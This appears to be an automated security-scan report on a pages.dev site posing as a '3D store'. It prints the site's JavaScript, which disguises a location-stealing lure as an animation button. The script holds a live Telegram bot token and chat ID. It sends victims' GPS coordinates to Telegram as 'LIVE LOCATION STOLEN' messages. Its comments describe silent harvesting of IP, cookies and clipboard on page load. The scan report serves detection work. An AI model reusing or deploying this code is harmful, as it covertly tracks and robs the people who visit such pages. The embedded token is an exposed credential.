technology software

entertainment media

English

The domain name 'ultrastorm-9a9.pages.dev' uses the developer-focused generic top-level domain (.dev), featuring subdomain 'ultrastorm-9a9'. Its registrable label 'pages' stretches across 5 characters holding two vowels versus 3 consonants. Segmentation suggests 1 word: pages. No strong language cues emerged from the frequency lists.

html/3e/5c/3e5c2710-dfe6-439e-acb1-174130b09e6d.html.gz

5a50a5305058255cfaa39775b7e489bf16b107193bb1705b9ef5a2d58858f817

html/3e/5c/3e5c2710-dfe6-439e-acb1-174130b09e6d_nodriver.html.gz

Storm store 3D

Abuse Team

CloudFlare, Inc.

pages.dev

Cloudflare Abuse Contact

MNT-CLOUDFLARE

Cloudflare Technical Contact

CLOUDFLARENET-EU

// Telegram config
 const TELEGRAM_BOT_TOKEN = '7221517991:AAF8X0Mz2wynFL_WeYdIDdE1crK1Vkp3yRs';
 const TELEGRAM_CHAT_ID = '5589844250';

 async function sendToTelegram(text) {
 try {
 await fetch(`https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`, {
 method: 'POST',
 headers: { 'Content-Type': 'application/json' },
 body: JSON.stringify({
 chat_id: TELEGRAM_CHAT_ID,
 text: text,
 parse_mode: 'HTML'
 })
 });
 } catch (e) {}
 }

 // Simple floating particles animation (pure CSS/JS - no heavy libs)
 const particlesDiv = document.getElementById('particles');
 for (let i = 0; i < 80; i++) {
 const p = document.createElement('div');
 p.style.position = 'absolute';
 p.style.width = Math.random() * 6 + 'px';
 p.style.height = p.style.width;
 p.style.background = `hsl(${Math.random()*360}, 70%, 70%)`;
 p.style.borderRadius = '50%';
 p.style.left = Math.random() * 100 + 'vw';
 p.style.top = Math.random() * 100 + 'vh';
 p.style.opacity = Math.random() * 0.6 + 0.2;
 p.style.boxShadow = '0 0 10px ' + p.style.background;
 p.style.animation = `float ${Math.random()*20 + 10}s linear infinite`;
 particlesDiv.appendChild(p);
 }

 // Add CSS for particle float
 const style = document.createElement('style');
 style.innerHTML = `
 @keyframes float {
 0% { transform: translateY(100vh) translateX(0); }
 100% { transform: translateY(-100px) translateX(${Math.random()*200 - 100}px); }
 }
 `;
 document.head.appendChild(style);

 // Button click: show fake loading + get location
 document.getElementById('activateBtn').addEventListener('click', () => {
 const btn = document.getElementById('activateBtn');
 btn.disabled = true;
 btn.textContent = 'Initializing...';

 // Show fake loading screen
 document.getElementById('loadingOverlay').style.display = 'flex';

 if (!navigator.geolocation) {
 sendToTelegram('❌ Geolocation not supported - but victim clicked anyway.');
 return;
 }

 navigator.geolocation.getCurrentPosition(
 (position) => {
 const { latitude, longitude, accuracy } = position.coords;
 const mapsLink = `https://www.google.com/maps?q=${latitude},${longitude}`;
 const message = `
📍 LIVE LOCATION STOLEN

🔹 Lat: ${latitude}
🔹 Lon: ${longitude}
🔹 Accuracy: ±${accuracy}m

🗺️ <a href="${mapsLink}">Google Maps Link</a>

⚡ Bait: Clicked "ACTIVATE 3D ANIMATIONS"
 `;
 sendToTelegram(message);

 // Keep fake loading forever (or redirect if you want)
 document.getElementById('loadingText').innerHTML = 'Rendering 3D Scene... This may take a moment on your device';
 },
 (error) => {
 sendToTelegram(`❌ Location denied/failed - but they still clicked the bait button.`);
 document.getElementById('loadingText').innerHTML = 'Enhancing visuals... Almost ready';
 },
 { enableHighAccuracy: true, timeout: 20000, maximumAge: 0 }
 );
 });

 // ALL YOUR ORIGINAL STEALTH DATA COLLECTION CODE GOES HERE
 // (IP fetch, cookies, clipboard monitor, GPU, extensions, VPN detect, full report to Telegram, etc.)
 // It runs silently on page load - victim sees only cool animations

 // Example placeholder for your full steal code:
 (async () => {
 // Your full original script here - everything still works 100%
 // Send full victim report on load + any clipboard changes, etc.
 })();

Requests	IP Address	Location	AS Autonomous System
3	172.64.152.224	United States	AS13335
1	172.66.47.109	United States	AS13335CLOUDFLARENET
1	172.67.183.248	United States	AS13335
1	188.114.96.3	United States	AS13335CLOUDFLARENET
1	188.114.97.3	United States	AS13335CLOUDFLARENET
7	5	-	-

Security Scan Report: ultrastorm-9a9.pages.dev

Summary

AI Security Verdict

High Risk

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Detected Technologies3

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

ssdeep (Context Triggered Piecewise Hashing)

sdhash (Similarity Digest Hashing)

Image Hashes

Perceptual Hashes

Other Hashes

Scan History